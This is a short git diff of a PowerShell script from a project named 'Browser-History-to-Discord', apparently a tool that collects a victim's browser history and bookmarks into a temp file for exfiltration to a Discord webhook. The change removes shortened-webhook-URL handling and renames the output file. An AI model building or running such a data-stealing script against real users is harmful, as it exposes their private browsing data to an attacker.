diff --git a/Browser-History-to-Discord/main.ps1 b/Browser-History-to-Discord/main.ps1 index 9282709..0d47273 100644 --- a/Browser-History-to-Discord/main.ps1 +++ b/Browser-History-to-Discord/main.ps1 @@ -1,10 +1,7 @@  $whuri = "$dc" -# shortened URL Detection -if ($whuri.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $whuri = (irm $whuri).url} - -$outpath = "$env:temp\history.txt" +$outpath = "$env:temp\browser_history.txt" "Browser History `n -----------------------------------------------------------------------" | Out-File -FilePath $outpath -Encoding ASCII # Define the Regular expression for extracting history and bookmarks